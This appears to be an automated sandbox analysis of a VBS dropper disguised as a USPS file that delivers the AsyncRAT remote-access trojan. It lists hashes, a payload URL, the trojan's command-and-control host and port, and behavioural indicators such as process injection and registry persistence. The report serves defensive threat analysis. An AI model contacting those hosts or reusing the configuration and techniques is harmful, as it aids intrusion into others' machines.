Analysis
-
max time kernel
272s -
max time network
295s -
platform
windows10_x64 -
resource
win10-20220414-en -
resource tags
arch:x64arch:x86image:win10-20220414-enlocale:en-usos:windows10-1703-x64system -
submitted
29-07-2022 18:19
Static task
static1
Behavioral task
behavioral1
Sample
usps54732563.vbs
Resource
win7-20220718-en
Behavioral task
behavioral2
Sample
usps54732563.vbs
Resource
win10-20220414-en
General
-
Target
usps54732563.vbs
-
Size
523B
-
MD5
f83e436ca7acf3f80ca706e118288f2b
-
SHA1
2c760d46c138593186e359bef37a322dd3b73ece
-
SHA256
442a2a8f6b9284cdec1fb7ff52faed051cba8337295e550389bbdd7bbc6c8c41
-
SHA512
24a1ee24b6fb9387b70fa39ff22204a92dc25c1fbcd51f08fe50c776557ae5bd118bda68cc63e67a236aa3d98cb3add98d3189c4199bd227037e4ea8fdeb7f5a
Malware Config
Extracted
https://clever-ishizaka.45-86-146-20.plesk.page/enc.txt
Extracted
asyncrat
0.5.7B
29/7
vvat22.con-ip.com:7707
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
MShTa.exepOwErshEll.exepOwErshEll.exepOwErshEll.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2560 4400 MShTa.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4804 4400 pOwErshEll.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3512 4400 pOwErshEll.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4328 4848 pOwErshEll.exe -
Async RAT payload 4 IoCs
Processes:
resource yara_rule behavioral2/memory/236-248-0x000000000040C73E-mapping.dmp asyncrat behavioral2/memory/236-284-0x00000000003D0000-0x00000000003E2000-memory.dmp asyncrat behavioral2/memory/236-341-0x0000000006300000-0x000000000631C000-memory.dmp asyncrat behavioral2/memory/4280-568-0x000000000040C73E-mapping.dmp asyncrat -
Blocklisted process makes network request 5 IoCs
Processes:
MShTa.exepOwErshEll.exeflow pid process 2 2560 MShTa.exe 3 2560 MShTa.exe 5 2560 MShTa.exe 7 2560 MShTa.exe 10 4804 pOwErshEll.exe -
Modifies Installed Components in the registry 2 TTPs 1 IoCs
Processes:
explorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Registers COM server for autorun 1 TTPs 4 IoCs
Processes:
reg.exereg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" reg.exe Key created \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" reg.exe Key created \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 reg.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
explorer.exedescription ioc process File opened (read-only) \??\D: explorer.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
powershell.exeaspnet_compiler.exepowershell.exedescription pid process target process PID 4404 set thread context of 236 4404 powershell.exe aspnet_compiler.exe PID 236 set thread context of 1556 236 aspnet_compiler.exe cvtres.exe PID 236 set thread context of 2564 236 aspnet_compiler.exe cvtres.exe PID 3792 set thread context of 4280 3792 powershell.exe aspnet_compiler.exe -
Drops file in Windows directory 3 IoCs
Processes:
explorer.exeSearchUI.exedescription ioc process File created C:\Windows\rescache\_merged\2717123927\3950266016.pri explorer.exe File created C:\Windows\rescache\_merged\1601268389\3877292338.pri SearchUI.exe File created C:\Windows\rescache\_merged\4032412167\2900507189.pri explorer.exe -
Checks SCSI registry key(s) 3 TTPs 10 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
explorer.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 explorer.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
SearchUI.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU SearchUI.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS SearchUI.exe -
Processes:
explorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe -
Modifies registry class 38 IoCs
Processes:
reg.exeSearchUI.exeexplorer.exeexplorer.exereg.exereg.exereg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify explorer.exe Key created \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\Local Settings explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "56" SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "56" SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Key created \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.cortana SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.cortana SearchUI.exe Set value (str) \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\ reg.exe Key created \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "132944438531018384" explorer.exe Key created \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total SearchUI.exe Set value (str) \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "23" SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 reg.exe Key created \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance explorer.exe Key created \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DomStorageState SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total SearchUI.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" SearchUI.exe Set value (str) \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\ reg.exe Key created \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "23" SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} reg.exe Set value (data) \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix SearchUI.exe Set value (str) \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana SearchUI.exe Set value (data) \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams = 14000000070000000100010005000000140000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b0072000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c100000000000002000000e60707004100720067006a006200650078002000200033000a005600610067007200650061007200670020006e007000700072006600660000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000074ae2078e323294282c1e41cb67d5b9c000000000000000000000000d552f4dc77a3d80100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000002000000e60707004600630072006e0078007200650066003a002000360037002500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000100000073ae2078e323294282c1e41cb67d5b9c000000000000000000000000f85597dc77a3d80100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030000007b00360051003800300039003300370037002d0036004e00530030002d003400340034004f002d0038003900350037002d004e00330037003700330053003000320032003000300052007d005c004a0076006100710062006a0066002000510072007300720061007100720065005c005a0046004e00460050006800760059002e0072006b007200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000000000000e60704004e0070006700760062006100660020006100720072007100720071002e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000fffffffff9a6406d323dcb4f8a86be992e03dc760000000000000000000000008e7cb4774350d80100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e6070400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff75ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e6070400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff81ae2078e323294282c1e41cb67d5b9c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1804997378-2045782378-3882459628-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} reg.exe -
Modifies registry key 1 TTPs 4 IoCs
Processes:
reg.exereg.exereg.exereg.exepid process 2596 reg.exe 3976 reg.exe 4940 reg.exe 3068 reg.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
explorer.exepid process 4696 explorer.exe -
Suspicious behavior: EnumeratesProcesses 21 IoCs
Processes:
pOwErshEll.exepowershell.exepOwErshEll.exepowershell.exeaspnet_compiler.exepOwErshEll.exepowershell.exepid process 4804 pOwErshEll.exe 4804 pOwErshEll.exe 4804 pOwErshEll.exe 4980 powershell.exe 4980 powershell.exe 4980 powershell.exe 3512 pOwErshEll.exe 3512 pOwErshEll.exe 3512 pOwErshEll.exe 4404 powershell.exe 4404 powershell.exe 4404 powershell.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 4328 pOwErshEll.exe 4328 pOwErshEll.exe 4328 pOwErshEll.exe 3792 powershell.exe 3792 powershell.exe 3792 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
